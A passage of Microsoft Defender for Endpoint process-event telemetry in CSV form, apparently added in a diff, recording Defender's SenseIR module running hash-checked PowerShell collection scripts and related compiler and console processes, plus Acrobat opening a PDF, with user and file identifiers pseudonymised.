+759,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:26:13.775735100+00:00,20808,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4140"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:26:14.034687600+00:00,2021-06-24 09:26:53.597896+00:00,930af3ca-106c-4354-947d-43b5b06a66de,computerpii_0a470890c60768167990033d701e7bd881398861,178269,False,10.7740.19041.1052,False,11540474045137006,,11540474045177613,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+760,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:26:23.922843500+00:00,8744,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e2d5879f102b5df1f4ab678c7e09a07486d78462c572276efcc3d576da3fe1af')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 09:26:13.775735100+00:00,20808,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4140"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:26:24.099887700+00:00,2021-06-24 09:26:53.597962600+00:00,5a328b4d-397c-4b8b-b8b3-fb4003349555,computerpii_0a470890c60768167990033d701e7bd881398861,178270,False,10.7740.19041.1052,False,11540474045177613,,11540474045177614,2021-06-24 09:26:13.775735100+00:00,20808,2021-06-24 09:26:13.775735100+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,20808,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+761,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:26:24.033712200+00:00,12964,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 09:26:23.922843500+00:00,8744,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e2d5879f102b5df1f4ab678c7e09a07486d78462c572276efcc3d576da3fe1af')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",True,2021-06-24 09:26:13.775735100+00:00,20808,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:26:24.100114700+00:00,2021-06-24 09:26:53.598031400+00:00,f83e72be-bbe9-46d2-9544-3b18bdfc0e3b,computerpii_0a470890c60768167990033d701e7bd881398861,178271,True,10.7740.19041.1052,False,11540474045177614,,11540474045177615,2021-06-24 09:26:23.922843500+00:00,8744,2021-06-24 09:26:23.922843500+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,8744,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+762,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:26:27.208522500+00:00,10484,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\d14fjd0n.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 09:26:23.922843500+00:00,8744,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e2d5879f102b5df1f4ab678c7e09a07486d78462c572276efcc3d576da3fe1af')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",True,2021-06-24 09:26:13.775735100+00:00,20808,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:26:27.228612400+00:00,2021-06-24 09:26:53.599527100+00:00,d7b1d372-562c-4b6f-bad0-8454df93973f,computerpii_0a470890c60768167990033d701e7bd881398861,178291,False,10.7740.19041.1052,False,11540474045177614,,11540474045177616,2021-06-24 09:26:23.922843500+00:00,8744,2021-06-24 09:26:23.922843500+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,8744,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+763,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:26:27.306773700+00:00,5220,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_626bef6d1c6c34d8a2b6d6ed10376082a460dc1a.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_7b21541452101a68480817de4ee467e950c1c2e5.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 09:26:27.208522500+00:00,10484,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\d14fjd0n.cmdline""",True,2021-06-24 09:26:23.922843500+00:00,8744,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:26:27.675620600+00:00,2021-06-24 09:26:53.599889500+00:00,ce43095a-32ca-4c6e-8c29-cd09fb4c747a,computerpii_0a470890c60768167990033d701e7bd881398861,178296,False,10.7740.19041.1052,False,11540474045177616,,11540474045177617,2021-06-24 09:26:27.208522500+00:00,10484,2021-06-24 09:26:27.208522500+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,10484,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+764,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:40:43.526855800+00:00,11320,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\POI\FilePII_e2e51633525777eaeb5358388b398782e1eac070.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:40:43.749939400+00:00,2021-06-25 01:41:56.926616600+00:00,cfa4e0be-e673-41ec-b1e5-3ef9fee301c9,computerpii_0a470890c60768167990033d701e7bd881398861,183800,False,10.7740.19041.1052,False,11540474045178163,,11540474045178818,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+765,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:22.255138700+00:00,2021-06-24 01:27:36.387307+00:00,aecb7a75-18c9-4dd6-8ef7-1ab07214cbe0,computerpii_0a470890c60768167990033d701e7bd881398861,170921,False,10.7740.19041.1052,False,11540474045137006,,11540474045175619,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+766,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.310199600+00:00,10096,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '724627c153aa3f2da50b20d86f92b3d8662a6e37d3ae15b37a885cee9c094894')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.381744700+00:00,2021-06-24 01:27:36.387631100+00:00,6ec66c3f-dff0-4ae6-ae49-fc631e29a9eb,computerpii_0a470890c60768167990033d701e7bd881398861,170930,False,10.7740.19041.1052,False,11540474045175619,,11540474045175621,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,SenseIR.exe,11584,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+767,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.310202100+00:00,16528,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '860b4cdd466f2726cb0a70e8e277457c238c85126a012e988ac2e9a21621acfb')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.381915800+00:00,2021-06-24 01:27:36.387667300+00:00,49718ec0-a1e7-4049-8c16-c1c609e2f58a,computerpii_0a470890c60768167990033d701e7bd881398861,170931,False,10.7740.19041.1052,False,11540474045175619,,11540474045175622,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,SenseIR.exe,11584,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+768,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.310196700+00:00,8404,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '392cc8c75a0285f9d22c2b2c426a9ced73cc4d3ac2de972b65761b5b78cb4fca')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.382102400+00:00,2021-06-24 